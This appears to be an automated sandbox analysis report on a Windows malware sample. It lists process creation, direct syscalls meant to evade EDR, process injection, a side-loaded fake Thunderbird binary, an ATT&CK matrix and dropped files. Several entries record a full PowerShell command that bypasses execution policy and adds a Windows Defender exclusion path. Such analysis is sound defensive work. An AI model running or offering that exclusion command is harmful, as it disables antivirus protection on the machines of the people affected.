Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_10064BBF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_10064BBF

Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"			Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtCreateFile: Direct from: 0x7FF6F4E7931E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6F4CE563F
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtProtectVirtualMemory: Direct from: 0x7FF6F4E83D9E
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQueryValueKey: Direct from: 0x14011D93E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtProtectVirtualMemory: Direct from: 0x7FF6F4CEA04A
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	NtSetInformationThread: Direct from: 0x60379479
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtProtectVirtualMemory: Direct from: 0x7FF6F4E83E76
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtClose: Direct from: 0x14011D864
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtOpenKeyEx: Direct from: 0x7FF6F4D0B377	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtClose: Indirect: 0x14012000F
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6F4E7A95C
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtSetInformationProcess: Direct from: 0x7FF6F4CED041
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtCreateThreadEx: Direct from: 0x7FF6F4C259F0
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQueryInformationToken: Direct from: 0x7FF6F4D3DC7C
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtProtectVirtualMemory: Direct from: 0x7FF6F4E82440
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6F4C25592
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQueryValueKey: Direct from: 0x7FF6F4D0BDFA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6F4D45E4F
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtCreateFile: Direct from: 0x7FF6F4CE5415	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQueryValueKey: Direct from: 0x7FF6F4D0C754	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtAllocateVirtualMemory: Direct from: 0x14011D808
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6F4CDC242
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6F4D4069F
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtReadFile: Direct from: 0x7FF6F4CE569C	Jump to behavior
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	NtProtectVirtualMemory: Direct from: 0x77377B2E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtClose: Direct from: 0x7FF6F4E7BBD1
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQueryInformationProcess: Direct from: 0x7FF6F4CEBF72
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6F4C298FA
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtCreateFile: Direct from: 0x7FF6F4E76553	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtReadFile: Direct from: 0x14011D832	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQueryValueKey: Direct from: 0x7FF6F4D0C365	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQuerySystemInformation: Direct from: 0x7FF6F4D72B0B
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQueryInformationToken: Direct from: 0x7FFDB43E26A1
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtReadVirtualMemory: Direct from: 0x7FF6F4E761EF
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtClose: Direct from: 0x7FF6F4CEC76E
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtClose: Direct from: 0x7FF6F4E7BBC3
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtCreateFile: Direct from: 0x14011D7A4	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtProtectVirtualMemory: Direct from: 0x7FF6F4CD7BBB
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQuerySystemInformation: Direct from: 0x7FF6F4CD76C3
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	NtQuerySystemInformation: Direct from: 0x76230BD0
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtProtectVirtualMemory: Direct from: 0x7FF6F4CCC626
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtClose: Direct from: 0x7FF6F4E7BBAF
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtProtectVirtualMemory: Direct from: 0x7FF6F4E7A52E
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQueryValueKey: Direct from: 0x7FF6F4D0C853	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQueryInformationToken: Direct from: 0x7FF6F4D08460
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtAllocateVirtualMemory: Direct from: 0x140120A3C
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQueryInformationProcess: Direct from: 0x7FF6F4CDC661
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQuerySystemInformation: Direct from: 0x7FF6F4E7D365
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtSetInformationProcess: Direct from: 0x7FF6F4CEBD87
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQuerySystemInformation: Direct from: 0x7FF6F4D41A29

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\Qjsync.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Users\user\AppData\Local\Temp\Qjsync.exe base: 14011BC08			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Users\user\AppData\Local\Temp\Qjsync.exe base: 36B010			Jump to behavior

Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"	Jump to behavior
Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Process created: C:\Windows\Temp\AppsLo.exe "C:\Windows\Temp\AppsLo.exe"	Jump to behavior
Source: C:\Windows\Temp\AppsLo.exe	Process created: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe "C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe" -burn.clean.room="C:\Windows\Temp\AppsLo.exe" -burn.filehandle.attached=524 -burn.filehandle.self=532	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\Qjsync.exe C:\Users\user\AppData\Local\Temp\Qjsync.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe

Source: C:\Windows\Temp\AppsLo.exe

Code function: 6_2_008E1719 InitializeSecurityDescriptor,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,SetEntriesInAclA,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,SetSecurityDescriptorDacl,GetLastError,CoInitializeSecurity,LocalFree,

6_2_008E1719

Source: C:\Windows\Temp\AppsLo.exe

Code function: 6_2_008E3A5F AllocateAndInitializeSid,CheckTokenMembership,

6_2_008E3A5F

Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	Binary or memory string: Shell_TrayWnd
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	Binary or memory string: Progman
Source: thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: )[%d] Shell_TrayWndTrayNotifyWnd
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	Binary or memory string: XUL_APP_FILE@mozilla.org/xre/app-info;1nsXULAppInfo1.8.1.19WINNTx86-msvchelper.exeuninstallXCurProcD@mozilla.org/file/directory_service;1/fixregargv0ignoredbywinlaunchchild/uninstalllog=%s/postupdateToolkit Profile Service@mozilla.org/toolkit/profile-service;1@mozilla.org/event-queue-service;1@mozilla.org/embedcomp/window-watcher;1@mozilla.org/toolkit/app-startup;1@mozilla.org/chrome/chrome-registry;1Native App Support@mozilla.org/toolkit/native-app-support;1ProgmanDuplicateTokenExCreateProcessWithTokenWadvapi32.dllshell32.dllIsUserAnAdminXRE_PROFILE_LOCAL_PATHXRE_PROFILE_PATHNO_EM_RESTART=0NO_EM_RESTART=1@mozilla.org/appshell/window-mediator;1final-ui-startup@mozilla.org/observer-service;1XRE_BINARY_PATH=XUL_APP_FILE=NO_EM_RESTART=XRE_IMPORT_PROFILES=XRE_START_OFFLINE=XRE_PROFILE_LOCAL_PATH=XRE_PROFILE_PATH=NO_EM_RESTARTError: argument -install-global-theme is invalid when argument -osint is specified
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	Binary or memory string: SHAppBarMessageShell_TrayWndDragFullWindowsMenuShowDelayControl Panel\DesktopclipboardcacheAOLMAIL@mozilla.org/layout/plaintextsink;1</HTML><HTML>@v

Source: C:\Windows\Temp\AppsLo.exe

Code function: 6_2_008CEC07 cpuid

6_2_008CEC07

Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: GetKeyboardLayout,GetLocaleInfoA,		7_2_10023F71
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: GetLocaleInfoA,		7_2_100708F5

Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe	Queries volume information: C:\Users\user\Desktop\MiJZ3z4t5K.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\Temp\AppsLo.exe

Code function: 6_2_008B4EDF ConvertStringSecurityDescriptorToSecurityDescriptorW,GetLastError,CreateNamedPipeW,GetLastError,CreateNamedPipeW,GetLastError,CloseHandle,LocalFree,

6_2_008B4EDF

Source: C:\Windows\Temp\AppsLo.exe

Code function: 6_2_008A6037 GetSystemTime,GetDateFormatW,GetLastError,GetLastError,GetDateFormatW,GetLastError,

6_2_008A6037

Source: C:\Windows\Temp\AppsLo.exe

Code function: 6_2_008A61DF GetUserNameW,GetLastError,

6_2_008A61DF

Source: C:\Windows\Temp\AppsLo.exe

Code function: 6_2_008E887B GetTimeZoneInformation,SystemTimeToTzSpecificLocalTime,

6_2_008E887B

Source: C:\Windows\Temp\AppsLo.exe

Code function: 6_2_008A5195 GetModuleHandleW,CoInitializeEx,GetVersionExW,GetLastError,CoUninitialize,

6_2_008A5195

Source: C:\Users\user\Desktop\MiJZ3z4t5K.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	5 Native API	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	11 Disable or Modify Tools	OS Credential Dumping	12 System Time Discovery	Remote Services	1 Archive Collected Data	11 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	3 Command and Scripting Interpreter	1 Windows Service	11 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	3 Clipboard Data	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Service Execution	2 Registry Run Keys / Startup Folder	1 Access Token Manipulation	1 Abuse Elevation Control Mechanism	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	1 Windows Service	2 Obfuscated Files or Information	NTDS	155 System Information Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	213 Process Injection	1 Timestomp	LSA Secrets	231 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	2 Registry Run Keys / Startup Folder	11 DLL Side-Loading	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	41 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	121 Masquerading	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	41 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	213 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
MiJZ3z4t5K.exe	0%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\smomwacaueqiut	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Qjsync.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\smomwacaueqiut	37%	ReversingLabs	Win64.Trojan.Ulise
C:\Users\user\AppData\Roaming\GZManage\js3250.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\GZManage\nsldap32v50.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\GZManage\nsldappr32v50.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\GZManage\nspr4.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\GZManage\nss3.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\GZManage\plc4.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\GZManage\plds4.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\GZManage\smime3.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\GZManage\softokn3.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\GZManage\ssl3.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\GZManage\xpcom_compat.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\GZManage\xpcom_core.dll	4%	ReversingLabs
